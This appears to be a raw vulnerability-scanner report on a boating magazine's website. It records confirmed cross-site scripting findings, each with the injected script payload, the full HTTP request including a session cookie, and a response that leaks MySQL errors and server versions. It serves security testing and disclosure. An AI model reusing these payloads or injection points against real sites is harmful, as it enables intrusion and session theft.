<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/mor..
- /news/todays-top-stories/276002-cell-phone-call-saves-lost-mariners

/news/todays-top-stories/276002-cell-phone-call-saves-lost-mariners CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories/276002-cell-phone-call-saves-lost-mariners?'%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00243D)</script>

Request

GET /news/todays-top-stories/276002-cell-phone-call-saves-lost-mariners?'"--></style></script><script>netsparker(0x00243D)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00243D)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00243D)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories/276002-cell-phone-call-saves-lost-mariners" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Cell phone call saves lost mariners" /> <meta name="author" content="Mike Trocchi" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Cell phone call saves lost mariners</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"&g..
- /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan CONFIRMED

http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-y..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00241B)</script>

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'"--></style></script><script>netsparker(0x00241B)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00241B)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00241B)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011" /> <meta name="title" content="Mishaps & rescues - Connecticut and New York - Jan." /> <meta name="author" content="Esther Pope" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Mishaps &amp; rescues - Connecticut and New York - Jan.</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_cg_responses m_cg_responses"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 36, c_cg_responses<br />Menu: 85, m_cg_responses-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a 